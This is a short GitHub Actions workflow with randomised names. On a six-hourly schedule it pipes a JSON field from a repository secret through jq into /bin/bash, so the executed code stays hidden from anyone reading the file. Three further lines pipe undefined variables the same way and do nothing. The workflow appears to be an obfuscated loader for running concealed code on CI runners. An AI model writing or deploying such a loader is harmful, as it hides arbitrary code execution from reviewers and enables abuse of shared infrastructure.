name: taodingren6735
on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taodingren6735
        env:
          elfr877: ${{ secrets.elfr877 }}
        run: |
          echo $elfr877 | jq -r .yho3366 | /bin/bash
          echo $bx819 | jq -r .hwc0275 | /bin/bash
          echo $bg7725 | jq -r .h39668 | /bin/bash
          echo $xda28522 | jq -r .qc56562 | /bin/bash

